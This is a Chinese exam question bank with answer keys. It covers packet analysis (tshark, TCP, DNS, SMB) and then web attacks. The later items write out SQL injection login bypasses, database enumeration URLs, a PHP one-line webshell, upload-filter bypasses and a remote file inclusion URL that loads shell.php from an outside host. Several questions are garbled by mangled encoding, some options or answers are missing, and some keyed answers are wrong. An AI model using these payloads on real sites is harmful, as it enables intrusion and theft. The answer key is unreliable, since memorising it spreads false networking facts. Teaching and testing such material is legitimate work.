43、使用tshark从数据包筛选出指定IP地址的数据包文件命令是()

A、 tshark -r x.pcapng -Z “ip.addr==192.168.0.1” -w x2.pcapng

B、 tshark -r x.pcapng -V “ip.addr==192.168.0.1” -w x2.pcapng

C、 tshark -r x.pcapng -Y “ip.addr==192.168.0.1” -w x2.pcapng

标准答案: C

44、使用tshark查看数据包的TCP会话信息的命令()

A、 tshark -n -q -r x.pcap -z “conv.tcp”

B、 tshark -n -q -r x.pcap -z “smb.srt”

C、 tshark -n -q -r x.pcap -z “smb.srt”

标准答案: A

45、Wireshark环境下,使用Editcap x.pcapng output.pcapng -i 4命令的作用是()

A、 文件包切分成4个文件

B、 每四秒为间隔切分成一个文件

C、 每四分钟为间隔切分成一个文件

标准答案: B

46、使用tshark -n -q -r x.pcap -z “smb.srt”命令可以获取cifs协议响应时间的统计数据

A、 对

B、 错

标准答案: A

47、IP地址位于IOS七层模型的哪一层()

A、 会话层

B、 网络层

C、 数据链路层

D、 传输层

标准答案: B

48、Mac地址位于IOS七层模型的哪一层()

A、 会话层

B、 网络层

C、 数据链路层

D、 传输层

标准答案: C

49、ARP协议的作用是()

A、 将端口号映射到IP地址

B、 连接IP层和TCP层

C、 广播IP地址

D、 将IP地址映射到第二层地址

标准答案: D

50、ARP协议的解析过程用了几种数据包()

A、 2

B、 3

C、 4

标准答案: A

1、使用哪条命令查看本地的缓存列表()

A、 arp -d

B、 arp -a

C、 arp -s

D、 arp -N

标准答案: B

2、免费ARP报文携带的发送端地址和目标地址都是本机IP地址

A、 对

B、 错

标准答案: A

3、ICMP是什么协议()

A、 动态主机设置协议

B、 Internet控制报文协议

C、 超文本传输协议

D、 超文本传输协议

标准答案: B

4、假设TTL的初始值为3,两台主机之间存在4个路由器,则该数据包到达目的地后的TTL的值为()

A、 1

B、 2

C、 3

D、 数据包无法到达

标准答案: D

5、在IP数据包里,如果一个数据流被分割成了三片,则最后一个数据包的More fragments的值为()

B、 1

C、 2

D、 4

标准答案: A

6、以下哪个端口可以由操作系统临时使用()

A、 143

B、 80

C、 443

D、 1433

标准答案: D

7、在正常的TCP握手数据包中,如果第一次握手的seq=1,则第三次握手的seq值应该是()

标准答案: C

8、在TCP的断开流程中,第三次会发出()标志位的TCP数据包。

A、 FIN

B、 ACK

C、 FIN/ACK

D、 WIND

标准答案: C

9、TCP数据包里的出现什么标志位表示连接被异常终止,或被拒绝的异常请求()

A、 FIN/ACK

B、 ACK

C、 SYN

D、 RST/ACK

标准答案: D

10、如果一个TCP的数据包的Len=0,则以下说法正确的是()

A、 这是一个无意义的数据包

B、 并不能说明什么

C、 网络传输出现了故障

D、 这是一个错误的数据包

标准答案: B

11、TCP提供有序的数据传输依靠什么序列号来排序()

A、 SEQ

B、 FIN

C、 ACK

D、 SYN

标准答案: A

12、第二个TCP数据包的Seq值等于第一个数据包的Seq值加上()

A、 win

B、 Len

C、 ACK

D、 SEQ

标准答案: B

13、在TCP数据交互里,什么决定是否有必要进行数据包重传的一个主要机制()

A、 WIND

B、 RTO

C、 LEN

D、 TTL

标准答案: B

14、Windows系统默认的TCP Retransmission的次数为()

A、 3

B、 4

C、 5

D、 6

标准答案: C

15、在TCP协议包里,如果接收方发现丢包的情况,则会发送()个重复ACK数据包

A、 3

B、 4

C、 5

D、 6

标准答案: A

16、在TCP协议包里,如果SACK后面的值为100-200,则说明()

A、 100之前的数据已收到

B、 100至200的数据未收到

C、 100至200的数据已收到

D、 200之后的数据已收到

标准答案: C

17、ICMP数据包的最大尺寸为()

A、 16K

B、 32K

C、 64K

D、 128K

标准答案: C

18、哪个命令用于识别一个设备到另一个设备的网络路径()

A、 ping

B、 tracert

C、 nslookup

D、 net send

标准答案: B

19、tracert命令进行路由跟踪时,TTL值初始为()

标准答案: B

20、使用tracert时,如果遇到第一个路由器,数据包就被丢弃,则()

A、 数据包不再发送

B、 重新发送相同的数据包

C、 将TTL值增1之后再发送

D、 以上无正确答案

标准答案: B

21、DHCP协议属于IOS哪一层协议()

A、 会话层

B、 网络层

C、 数据链路层

D、 应用层

标准答案: D

22、以下哪个选项不属于DHCP的工作过程()

A、 DHCP Discover

B、 DHCP offer

C、 DHCP Request

D、 DHCP Listen

标准答案: D

23、在DHCP协议Discover包中,客户端IP地址为()

A、 0.0.0.0

B、 255.255.255.255

C、 网关IP

D、 无法确定

标准答案: A

24、在Wireshark下筛选DHCP协议的数据包的关键字是()

A、 bootp

B、 udp

C、 bootparams

D、 tcp

标准答案: A

25、在进行DNS解析的过程中,客户计算机会首先在本地的()文件中查找主机名称所对应的IP地址

A、 svchost

B、 config.ini

C、 hosts

D、 taskmgr

标准答案: C

26、DNS区域传送使用什么数据包()

A、 HTTP

B、 BOOTP

C、 DHCP

D、 TCP

标准答案: D

27、DNS解析的两种查询方式()

A、 反向查询

B、 迭代查询

C、 循环查询

D、 递归查询

标准答案:

28、DNS的作用是完成域名和IP地址相互转换的工作

A、 对

B、 错

标准答案: A

29、DNS服务使用的端口号是()

A、 443

B、 53

C、 23

D、 25

标准答案: B

30、当HTTP连接成功完成后,则最后一个数据包里面的状态码为()

A、 200

B、 403

C、 404

D、 500

标准答案: A

31、HTTP 302状态消息表示?()

A、 所请求的页面已经转移至新的url

B、 所请求的页面已经临时转移至新的url

C、 对被请求页面的访问被禁止

D、 所请求的页面可在别的url下被找到

标准答案: B

32、Wireshark工具下,使用哪条命令筛选出HTTP请求包()

A、 http.request.line

B、 http.request.method

C、 http.request.version

D、 http.request.method==GET

标准答案: D

33、Https服务使用的端口号是()

A、 23

B、 25

C、 53

D、 443

标准答案: D

34、以下哪项一般不会使用SSL协议进行数据传输()

A、 QQ邮箱登录

B、 网银登录

C、 论坛登陆

D、 网上支付

标准答案: C

35、在SSL握手的过程中,紧接着Server Hello的过程是()

A、 Client Hello

B、 Client Key Exchange

C、 Application Data

D、 Certificate

标准答案: D

36、FTP进行数据传输所使用的默认端口为()

A、 20

B、 21

C、 24

D、 23

标准答案: A

37、FTP协议默认采用的不是明文账户密码传输

A、 对

B、 错

标准答案: B

38、FTP被动方式传输数据包的关键字是PASV

A、 对

B、 错

标准答案: A

39、在实际的网络应用中,Kerberos的认证结果是()

A、 单向

B、 双向

C、 不定向

D、 依据网络实际情况而定

标准答案: B

40、在Kerberos中,哪个拥有所有的密码()

A、 Client

B、 Server

C、 KDC

D、 无正确答案

标准答案: C

41、在Kerberos中,通过计算发送时间与接收回复时间的差值,可以对抗什么攻击()

A、 DDoS

B、 重放

C、 木马

D、 暴力破解

标准答案: B

42、以下哪个操作系统一般并不使用NFS协议()

A、 Windows

B、 Ubuntu

C、 RedHat

D、 Centos

标准答案: A

43、在NFS的写文件操作中,需要利用什么操作来确定是否存盘()

A、 GETPORT

B、 ACCESS

C、 WRITE

D、 COMMIT

标准答案: D

44、在NFS的写文件操作协议中,查看文件是否存在使用什么标识头()

A、 LOOKUP

B、 CREATE

C、 GETATTR

D、 COMMIT

标准答案: A

45、在NFS协议中,Portmap请求无回复,可能是防火墙导致

A、 对

B、 错

标准答案: A

46、在NFS协议中,MOUNT请求无回复,可能是共享目录访问控制权限导致

A、 对

B、 错

标准答案: A

47、在NTF协议中,用什么标识来确认用户()

A、 UID

B、 GID

C、 Name

标准答案: A

48、linux系统里可以使用CIFS协议

A、 对

B、 错

标准答案: B

49、以下哪个是Windows自己维护的文件共享协议()

A、 TCP

B、 NFS

C、 TCP

D、 SMB

标准答案: D

50、在SMB协议包中,Session Setup的任务是()

A、 身份验证

B、 身份确认

C、 会话结束

标准答案: A

1、SMB中的什么操作可以对访问权限进行检测()

A、 write

B、 read

C、 create

D、 trans

标准答案: C

2、在SMB协议中,create操作包括哪些动作()

A、 新建文件

B、 目录打开

C、 文件读写

标准答案:

3、CIFS协议在Windows 7中可以一次性发送多个连接请求

A、 对

B、 错

标准答案: A

4、以下哪个协议与电子邮件协议无关()

A、 HTTP

B、 IMAP

C、 POP

D、 SMTP

标准答案: A

5、邮件的附件内容是利用什么方式进行加密的()

A、 MD5

B、 RSA

C、 Base64

D、 DES

标准答案: C

6、SMTP协议包,文本内容以什么作为结束符()

A、 CR

B、 CR&LF

C、 LF

D、 ENTER

标准答案: B

7、SMTP协议使用的端口()

A、 21

B、 143

C、 24

D、 25

标准答案: D

8、在POP协议中,客户端向服务端发送什么命令请求邮件的内容()

A、 LIST

B、 RETR

C、 UIDL

D、 QUIT

标准答案: B

9、常用以双等号结尾的加密数据,一般采用Base64解密

A、 对

B、 错

标准答案: A

10、判断一个文件是不是PE文件,常用的方法是()

A、 查看文件扩展名

B、 查看文件开头位置是不是0xFFD8

C、 查找MZ以及PE标志

D、 没有特别有效的办法

标准答案: C

11、以下哪款工具主要用于文件的二进制修改()

A、 FFV

B、 WinHex

C、 Beyond Compare

D、 python

标准答案: B

12、NBNS协议是网络基本输入/输出系统协议

A、 对

B、 错

标准答案: A

13、在局域网内部使用什么协议可以方便地实现消息通信及资源的共享()

A、 NetBIOS

B、 DHCP

C、 ICMP

D、 DNS

标准答案: A

14、在以下什么数据包中,可以找到主机名称和所处的环境工作组()

A、 DNS

B、 DHCP

C、 ICMP

D、 NBNS

标准答案: D

15、Kali Linux使用什么来获取IPv6的地址()

A、 ARPv6

B、 DHCPv6

C、 ICMPv6

D、 DNSv6

标准答案: C

16、对比WinXP的默认启动过程,什么是Kali Linux启动过程所独有的()

A、 NBNS

B、 DHCPv6

C、 ICMPv6

D、 DNSv6

标准答案: C

17、IPv4地址的长度为多少位()

A、 16

B、 32

C、 64

D、 128

标准答案: B

18、某子网掩码为255.255.0.0,说明网络地址长度为多少位()

A、 16

B、 32

C、 64

D、 128

标准答案: A

19、在IP地址10.10.1.22和网络掩码255.255.0.0的情况下,下面哪个选项是正确的CIDR写法()

A、 10.10.1.22/8

B、 10.10.1.22/16

C、 10.10.1.22/24

D、 10.10.1.22/32

标准答案: B

20、计算机跨子网通信是需要默认网关来进行转发

A、 对

B、 错

标准答案: A

21、如果Wireshark当前所发送的数据包填满接收方的缓存时,就会在该TCP数据包上标记出什么字样

A、 TCP Window Full

B、 TCP Zero Window

C、 Zero Window Prob

D、 Zero Window Violation

标准答案: A

22、当接收方收到包含有“TCP Window Full”字样的TCP数据包以后,如果不能够及时处理缓存中的内容,那么接收方一般会回复一条带有什么字样的数据包,请求发送方暂缓发送数据()

A、 TCP Window Full

B、 TCP Zero Window

C、 Zero Window Prob

D、 Zero Window Violation

标准答案: B

23、发送方在发送了一个TCP数据包之后,经过RTO时间,没有收到对方的确认数据包,则应该?

A、 停止通信

B、 检测网络

C、 重传

D、 直接发送下一个数据包

标准答案: C

24、进行流量分析,端口镜像往往是我们首选的功能,因为它不会留下网络痕迹,也不会因此而产生额外的数据包

A、 对

B、 错

标准答案: A

25、以下哪项无线协议标准最不安全()

A、 WEP

B、 WPA

C、 WPA2

D、 WPA3

标准答案: A

26、无线网络协议遵循的是IEEE的什么标准()

A、 800.11

B、 801.1

C、 802.1

D、 802.11

标准答案: D

27、无线网络数据包与有线网络数据包最大的不同在于额外的802.11头部

A、 对

B、 错

标准答案: A

28、下面哪项是首选的嗅探器部署方法,因为它不会留下网络痕迹,也不会因此而产生额外的数据包()

A、 端口镜像

B、 ARP欺骗

C、 集线器输出

D、 使用网络分流器

标准答案: A

29、以下哪种wireshark部署方法,并不推荐采用()

A、 单个系统安装

B、 端口镜像

C、 集线器输出

D、 使用网络分流器

标准答案: A

30、不用考虑客户机临时下线的情况,我们采用哪种流量部署方法()

A、 端口镜像

B、 ARP欺骗

C、 集线器输出

D、 使用网络分流器

标准答案: C

31、在光纤情况下,不用考虑客户机临时下线的情况,我们采用哪种流量部署方法?

A、 端口镜像

B、 ARP欺骗

C、 集线器输出

D、 使用网络分流器

标准答案: D

32、进行环境测试评估,和进行性能审查,分析数据包,我们采用哪种流量部署方法()

A、 端口镜像

B、 ARP欺骗

C、 直接系统安装

D、 使用网络分流器

标准答案: C

33、网络分流器一般有聚合的和非聚合的网络分流器两种

A、 对

B、 错

标准答案: A

34、对于TCP的三次握手,以下哪项用于第一个数据包()

A、 SYN

B、 FIN

C、 RST

D、 ACK

标准答案: A

35、以下哪个文件保存有域名重定向信息()

A、 svchost

B、 csrss

C、 hosts

D、 spoolsv

标准答案: C

36、当试图访问对方未配置的的80端口时,对方数据包会回复()

A、 SYN

B、 FIN

C、 RST

D、 ARP

标准答案: C

37、在TCP的SYN数据包之后,应当收到什么数据包()

A、 SYN

B、 FIN

C、 RST

D、 SYN\ACK

标准答案: D

38、连远程服务器无响应无TCP RST这样的数据包,以下哪项不属于这种情况出现的原因()

A、 Web服务器配置错误

B、 Web服务器的协议栈崩溃

C、 防火墙数据包过滤设备

D、 Hosts配置错误

标准答案: D

39、DNS是基于什么协议()

A、 UDP

B、 TCP

C、 HTTP

D、 FTP

标准答案: A

40、DNS在如同区域传输中,使用什么协议()

A、 UDP

B、 TCP

C、 HTTP

D、 FTP

标准答案: B

41、关于CSRF说法正确的是

A、 删掉referer字段可以用来防止CSRF攻击

B、 CSRF攻击只能利用GET方式去达到攻击的目的

C、 登录受信任网站A,并在本地生成Cookie,在不登出A的情况下,访问危险网站B这样有可能会受到CSRF攻击

D、 XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站

标准答案: D

42、xss和csrf的漏洞原理是一样的

A、 对

B、 错

标准答案: B

43、在利用CSRF漏洞去脱裤的时候,说法错误的是

A、 CSRF是利用管理员的操作在无声无息中进行

B、 攻击者在无法预计管理员操作的过程中也是可以进行CSRF的攻击操作

C、 普通用户插入备份数据库的代码后,通过CSRF管理员触发到代码后会自动备份网站的数据库

D、 找到备份数据库的网站路径即可下载网址的.sql文件

标准答案: B

44、CSRF可以在无声无息中进行管理员的操作

A、 对

B、 错

标准答案: A

45、关于逻辑/越权漏洞说法有误的是

A、 任意用户查询,任意删属于越权漏洞,而密码找回漏洞属于逻辑漏洞

B、 一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽未对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。

C、 垂直权限的访问控制缺失是逻辑/越权漏洞的根本原因

D、 密码找回漏洞是权限管理不足导致的问题

标准答案: D

46、挖掘密码找回逻辑漏洞黑盒Fuzz来推断程序代码是关键

A、 对

B、 错

标准答案: A

47、关于密码找回说法有误的是

A、 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解

B、 有些密码找回凭证可从客户端直接获取

C、 密码找回凭证存与单个用户绑定的可以解决密码找回漏洞

D、 修改密码过程中,验证码是可操作的话 可以直接导致密码重置

标准答案: C

48、有时候我们可以通过注入漏洞来控制找回密码的凭证来达到密码重置的目的

A、 对

B、 错

标准答案: A

49、关于越权漏洞说法有误的是

A、 1. 越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定

B、 2. 挖掘越权漏洞一般是从一些拥有敏感信息的地方(例如:收货地址/个人资料/用户订单等)进行测试

C、 3. 处理越权漏洞可以通过用户对某一数据进行增删改查时需要去校验下所操作的数据是否属于该用户

D、 4. 越权漏洞的本身对网站不会照成攻击伤害

标准答案: D

50、以下哪个选项对asp运算符的解释错误?()

A、 <>为不等于

B、 IS判断两个字符串是否相等

C、 XOR为”异或”运算

D、 OR为”或”运算

标准答案: B

1、SQL语句”select * from user where name=’”.n a m e . &quot; ′ a n d p a s s = ′ &quot; . name.&quot;&#x27; and pass=&#x27;&quot;.name.andpass=.pass.”’”如何绕过登录?()

A、 $name设置值为admin’ and ‘1’=‘1’ $pass的值为123456

B、 $name设置值为admin’ and ‘1’=’1 $pass的值为123456

C、 $name设置值为admin’ or ‘1’=’1 $pass的值为123456

D、 $name设置值为admin’ or ‘1’=‘1’ $pass的值为123456

标准答案: C

2、以下哪个选项的内容可以替代SQL语句中的空格?()

A、 /**/

B、 #

C、 –

D、 //

标准答案: A

3、PHP的addslashes函数的作用是什么?()

A、 去除字符串中的预定义字符

B、 将字符串中的预定义字符之前添加反斜杠

C、 将字符串按照预定义字符进行分割

D、 将字符串中的预定义字符替换为空格

标准答案: B

4、mysql数据库使用utf-8字符集可能导致宽字节注入。

A、 对

B、 错

标准答案: B

5、%df’在以下哪种情况下能闭合单引号,形成宽字节注入?()

A、 使用PHP的trim函数,字符集使用utf-8

B、 使用PHP的trim函数,字符集使用gbk

C、 使用PHP的addslashes函数,字符集使用utf-8

D、 使用PHP的addslashes函数,字符集使用gbk

标准答案: D

6、以下哪种方式可以防止宽字节注入?()

A、 mysql_query(“set names gbk”)和addslashes()函数结合使用

B、 使用mysql_query(“set names gbk”)设置字符集

C、 mysql_set_charset(“gbk”)和mysql_real_escape_string()函数结合使用

D、 使用mysql_set_charset(“gbk”)设置字符集

标准答案: C

7、下列 ASP 接受参数的方式错误的是()

A、 request

B、 request.get

C、 request.cookie

D、 request.form

标准答案: B

8、下列链接中不存在注入点的是()

A、 http://www.****.com/***.asp?id=XX

B、 http://www.****.com/***.php?name=XX&page=99

C、 http://www.****.com/index/new/php-8.html

D、 http://www.****.com/news.html

标准答案: D

9、下列 mysql 的 PHP 函数说法错误的是()

A、 mysql_connect(‘host’, ‘username’, ‘pass’); 连接 mysql 链接

B、 mysql_db_select($database, $conn); 选择数据库

C、 mysql_query($sql, $conn); 执行 SQL 语句

D、 mysql_fetch_array($result); 将查询结果的一条返回到一个数组中

标准答案: B

10、下面说法是否正确,注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明()

A、 对

B、 错

标准答案: A

11、程序使用 SQLServer 数据库,当程序登录页面存在注入时,下列选项中,属于万能密码的是()

A、 用户名输入: ‘(或”) AND 1 = 1– ;密码随便输入

B、 用户名输入: ‘(或”) && 1 = 1– ;密码随便输入

C、 用户名输入: ‘(或”) OR 1 = 1– ;密码随便输入

D、 用户名输入: ‘(或”) || 1 = 1– ;密码随便输入

标准答案: C

12、已知 SQL 语句为:s q l = ′ S E L E C T ∗ F R O M ‘ m e m b e r ‘ W H E R E ‘ u s e r n a m e ‘ = &quot; ′ . sql = &#x27;SELECT * FROM `member` WHERE `username` = &quot;&#x27;.sql=SELECTFROMmemberWHEREusername=._GET[‘name’].’” AND password = “’.$_GET[‘pwd’].’”’; ,当访问 http://xxx.com?name=admin” OR “1”=“2&pwd=” OR “1”=”1 时,可以完成用户验证吗()

A、 对

B、 错

标准答案: A

13、已知字符型注入语句 s q l = ′ S E L E C T ∗ F R O M ‘ m e m e b e r ‘ W H E R E ‘ u s e r n a m e ‘ = &quot; ′ . sql = &#x27;SELECT * FROM `memeber` WHERE `username` = &quot;&#x27;.sql=SELECTFROMmemeberWHEREusername=.user.’” AND pass = “’.$pass.’”’,下列能成功执行注入的是()

A、 $user = ‘admin OR 1 = 1–’; $pass = ‘something’;

B、 $user = ‘admin OR 1 = 2’; $pass = ‘” OR 1 = 1’;

C、 $user = ‘admin” OR 1 = 1’; $pass = ‘” OR 1 = 2’;

D、 $user = ‘admin” OR “1” = “2’; $pass = ‘” OR “1” = “1’;

标准答案: D

14、MySQL 5 中新增了一个 information_schema 库,该库中存储了数据库信息内容,可直接爆库、爆表、爆字段;而 MySQL 4 只能采用类似 Access 的方法进行查询猜解,该说法是否正确()

A、 对

B、 错

标准答案: A

15、用 ORDER BY 来判断字段数量时,ORDER BY 后面跟 5 时,正常返回,后面跟 6 时,报 Unknown column ‘6’ in ‘order clause’ 错误,当前目标表有几个字段()

A、 4

B、 5

C、 6

D、 7

标准答案: B

16、使用 ORDER BY 手工注入进行字段数判断时,ORDER BY 6 未报错,ORDER BY 7 报 UNKNOWN COLUMN ‘7’ IN ‘ORDER CLAUSE’,该表有几个字段()

A、 5

B、 6

C、 7

D、 8

标准答案: B

17、已知 MySQL 版本大于 5,手工注入时,访问 http://127.0.0.1/index.php?id=3’%20SELECT%20GROUP_CAT(SCHEMA_NAME)%20FROM%20INFROMATION_SCHEMA.SCHEMATA,可以获取到的是()

A、 所有数据库

B、 所有表

C、 所有字段

D、 所有字段类型

标准答案: A

18、在 MySQL INFORMATION_SCHEMA 数据库中,保存数据库信息的表是()

A、 TABLES

B、 SCHEMATA

C、 COLUMNS

D、 DATABASES

标准答案: B

19、SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() LIMIT 0,1 ,该语句查询的是当前数据库的第一条表信息,该说法正确吗()

A、 对

B、 错

标准答案: A

20、下列 MySQL 的 SQL 语句中,能同时查询用户、数据库版本、数据库并以 , 分割的是()

A、 SELECT user(),version(),database();

B、 SELECT user(),’,’,version(),’,’,database();

C、 SELECT user().version().database();

D、 SELECT group_concat(user(),version(),database());

标准答案: D

21、下列 MySQL 的 SQL 语句中,能够查询所有数据库的是()

A、 SELECT TABLE_NAME FROM INFROMATION_SCHEMA.TABLES;

B、 SELECT SCHEMA_NAME FROM INFROMATION_SCHEMA.SCHEMATA;

C、 SELECT DATABASE_NAME FROM INFROMATION_SCHEMA.DATABASES;

D、 SELECT COLUMN_NAME FROM INFROMATION_SCHEMA.COLUMNS;

标准答案: B

22、下面上传突破说法错误的是()

A、 客户端 JavaScript 可以通过 Burp 抓包修改进行上传

B、 服务端 MIME 类型检测可以通过修改 Content-Type 进行上传

C、 服务端文件扩展名检测可以通过服务端解析漏洞,上传其他扩展名文件进行突破

D、 使用 a.asp;.jpg 对 IIS 8.0 服务器进行上传突破

标准答案: D

23、在非 PHP 的 WEB 安全中出现概率很大而且威力也很大的攻击主要有两种,第一种是 SQL 注入,第二种是上传攻击。该说法正确吗()

A、 对

B、 错

标准答案: A

24、使用 Burp 抓包实验 0x00 截断时,下面做法可以完成绕过的是()

A、 直接在抓的包中修改 filename 部分,将可以上传的扩展名前面加空格拼接到文件后面

B、 直接在抓的包中修改 Content-Type

C、 在 Burp 抓的包中选择 Hex(十六进制),修改符合条件的后缀名前面点的十六进制为 00

标准答案: C

25、服务器检测绕过(目录路径检测),因为对目录路径的检测不够严谨而导致可以使用 0x00 截断攻击,该说法是否正确()

A、 对

B、 错

标准答案: A

26、在 fckeditor 2.4.3 或之前版本的黑名单中 ConfigDeniedExtensions.Add “File”, “html|htm|php|php2|php3|php4”,下列方法中可以绕过上传 php 文件的是()

A、 上传文件 shell.PhP

B、 上传文件 shell.php4

C、 上传文件 shell.php3

D、 上传文件 shell.php .jpg

标准答案: A

27、已知服务器为 Apache,且后缀名 123abc 未在黑名单中、后缀名 asp 在黑名单中,上传 shell.asp.123abc 文件能否成功执行()

A、 对

B、 错

标准答案: A

28、利用 IIS 解析漏洞,含有一句话木马的文件 test.php;.jpg,可以被菜刀连接成功吗()

A、 对

B、 错

标准答案: A

29、下列即属于黑名单检测绕过又属于白名单检测绕过的是()

A、 文件名大小写绕过

B、 名单列表绕过

C、 特殊文件名绕过(windows)

D、 0x00 截断绕过

标准答案: D

30、一个文件名为 x1.x2.x3 的文件,Apache 会从 x3 的位置往 x1 的位置开始尝试解析,一直往前解析,直到遇到一个能解析的扩展名为止,该说法正确吗()

A、 对

B、 错

标准答案: A

31、当 PHP 配置设置为可以远程包含时,下列是远程包含的是()

A、 http://www.mubiao.com/file.php?read=../../../image/shell.php

B、 http://www.mubiao.com/file.php?read=/image/shell.php

C、 http://www.mubiao.com/file.php?read=C:/htdocs/image/shell.php

D、 http://www.mubiao.com/file.php?read=http://www.xxx.com/shell.php

标准答案: D

32、当 PHP 配置文件中, allow_url_include 设置为 off 时,可以包含远程文件,该说法正确吗()

A、 对

B、 错

标准答案: B

33、Web目录下的upload/test.zip文件通过以下哪种链接可以下载?()

A、 upload/…/test.zip

B、 upload/…/./test.zip

C、 config/…/upload/test.zip

D、 config/././upload/test.zip

标准答案: C

34、Windows平台下的Web目录下的test.php不能通过test.PhP访问。

A、 对

B、 错

标准答案: B

35、PHP执行函数strrpos(“I_love_php.php”,”.php”)会返回什么值?()

A、 7

B、 8

C、 9

D、 10

标准答案: D

36、PHP执行函数strtolower(“PHP”)会返回什么值?()

A、 php

B、 Php

C、 PHp

D、 PHP

标准答案: A

37、关于安全狗检测cookie注入的功能,下列哪些说法正确?

A、 点击主动防御菜单中,Sql注入规则,选择cookie,点击确定

B、 无需配置,安全狗默认开启

C、 点击资源保护,选择cookie注入检测

标准答案: A

38、如果网站id参数过滤了and和号,就无法进行手工判断是否有注入点。

A、 对

B、 错

标准答案: B

39、在Sqlmap的tamper插件中,可以将空格转移成其他字符的是哪个脚本?

A、 space2mysqlblank

B、 apostrophemask

C、 equaltolike

标准答案: A

40、Sqlmap使用哪个参数可以直接对网站进行注入判断?

A、 –data

B、 –dbs

C、 =-u

标准答案: C

41、如何判断网站是否存在注入点?

A、 在网站参数后输入中文字符

B、 在网站参数后输入and 1=1、and 1=2

C、 在网站参数后输入 or 1=1

标准答案: B

42、Sqlmap中,下列哪个参数,可以获取当前数据库所在名称?

A、 –current-db

B、 –data

C、 –tables

标准答案: A

43、以下选项中,那一项是正确的PHP一句话木马?

A、 <?php @Page($_POST[value]);?>

B、 <?php @eval($_POST[v]);?>

C、 <%execute(request(“value”))%>

D、 <%eval(Request.Item[“value”])%>

标准答案: B

44、用户在上传图片时,快速返回错误提示则说明是本地的上传类型验证。

A、 对

B、 错

标准答案: A

45、当页面返回“File Type Error”时,则说明你上传的文件类型不正确,网站对文件类型进行了相关验证。

A、 对

B、 错

标准答案: A

46、针对文件扩展名检测,哪些扩展名可以绕过该限制?

A、 php2和php3

B、 php4和php3

C、 php5和php3

D、 php5和php2

标准答案: B

47、针对文件内容检测,如何进行绕过而上传?

A、 修改图片的类型

B、 使用burp抓包并插入一句话木马

C、 使用burp抓包并插入一句话木马,修改文件后缀

D、 使用burp抓包并修改文件后缀

标准答案: C

48、空字节截断目录路径检测绕过是将文件后缀替换空格就会成功上传

A、 对

B、 错

标准答案: B

49、在本节视频中,IIS6.0站上的解析缺陷绕过,上传后保存的路径正确的是?

A、 在1.php目录下

B、 1.php:1412790008.jpg

C、 upload/1.php

D、 upload/1412790008.jpg

标准答案: B

50、Apache服务中的解析缺陷,可以导致绕过上传的文件格式是什么?

A、 7z

B、 asp

C、 php

D、 asps

标准答案: A

1、htaccess文件上传解析漏洞,可以导致正确被解析的文件格式是?

A、 .png

B、 .bmp

C、 .img

D、 .jpg

标准答案: D

2、FCK编辑器的查看版本的URL路径是?

A、 _whatsnew.htmls

B、 _whatsnew.html

C、 _samples/default.html

D、 _samples/default.html/fck.html

标准答案: B

3、使用FCK编辑器解析漏洞进行上传,以下说法正确的是?

A、 直接利用新建文件夹1.asp

B、 新建文件夹1.asp,在1.asp目录下新建2.asp

C、 利用新建文件夹1.asp,再修改文件内容上传

D、 修改文件内容上传

标准答案: B

4、在IIS管理器里设置IP地址和域名限制拒绝列表不可以限制页面的访问

A、 对

B、 错

标准答案: B

5、.htaccess设置列表allow参数的意思是?

A、 禁止显示目录列表

B、 封禁一个IP地址

C、 允许特定的IP地址

D、 重定向

标准答案: C

6、下列选项对于谷歌语法中的site用法解释正确的是?

A、 把搜索范围规定在特定的站点中

B、 搜素范围限定在标题中

C、 网址中url的一些信息

D、 网页的链接中包含所有查询关键字

标准答案: A

7、服务端未对传入的跳转URL参数进行检测和控制而导致的URL调整漏洞

A、 对

B、 错

标准答案: A

8、XSS漏洞产生的原因是什么?

A、 对用户的输入过滤不足

B、 浏览器植入恶意软件

C、 Post请求被劫持

D、 WebKit安全机制不严谨

标准答案: A

9、利用存储型XSS漏洞可以进行XSS蠕虫攻击。

A、 对

B、 错

标准答案: A

10、当XSS代码被嵌入到标签中时,应该使用何种方式继续尝试进行攻击?

A、 修改浏览器进行尝试

B、 闭合标签后提交代码

C、 更换页面继续进行尝试

D、 闭合

标准答案: B

11、在浏览器支持JavaScript伪协议的情况下,可以使用HTML的属性值执行XSS代码

A、 对

B、 错

标准答案: A

12、在IE5及以后,CSS样式中使用Expression同样可以触发XSS漏洞

A、 对

B、 错

标准答案: A

13、采用黑名单过滤方式,用户可以结合使用注释字符感染和欺骗过滤器

A、 对

B、 错

标准答案: A

14、css_soup = BeautifulSoup(’

’);css_soup.p[‘class’] 这句输出的是字符串”body”吗

A、 对

B、 错

标准答案: B

15、Tag.clear() 方法是用来移除当前Tag的吗?

A、 对

B、 错

标准答案: B

16、code, head, html, redirect_url, log = hh.http(url)中log的数据类型是什么?

A、 字符串

B、 数字

C、 字典

D、 链表

标准答案: C

17、hackhttp可以用来上传文件这个说法正确吗

A、 对

B、 错

标准答案: A

18、hackhttp是通过以下代码来自定义cookie的吗 hackhttp.hackhttp(cookie=“a=b;”) ?

A、 对

B、 错

标准答案: B

19、BeautifulSoup 对象的.contents 属性可以将tag的子节点以数据类型的方式输出,是什么数据类型?

A、 字符串

B、 数字

C、 字典

D、 列表

标准答案: D

20、hh.http函数可以添加raw参数来发送原始http数据包这个说法正确吗

A、 对

B、 错

标准答案: A

21、hackhttp的示例代码code, head, html, redirect_url, log = hh.http(url)中hackhttp源码定义return这五个值的地方没有进行异常处理这个说法正确吗?

A、 对

B、 错

标准答案: B

22、queue库中构造函数Queue.LifoQueue实现的队列的进出关系是什么。

A、 先进先出

B、 先进后出

C、 优先级低先出

D、 就不出来

标准答案: B

23、class sb(threading.Thread):创建threading.Thread的父类来包装一个线程对象这个说法正确吗?

A、 对

B、 错

标准答案: B

24、代码for i in range(2122, 2127):的循环是用来遍历数字2122-2127这个说法正确吗?

A、 对

B、 错

标准答案: A

25、<div.*>(.+)这个正则匹配的是div标签中的文本内容这个说法正确吗。

A、 对

B、 错

标准答案: A

26、re.compile(“lowb”)会将字符串转化为一个什么对象?

A、 StringObject

B、 RegexObject

C、 InterObject

D、 NoneObject

标准答案: B

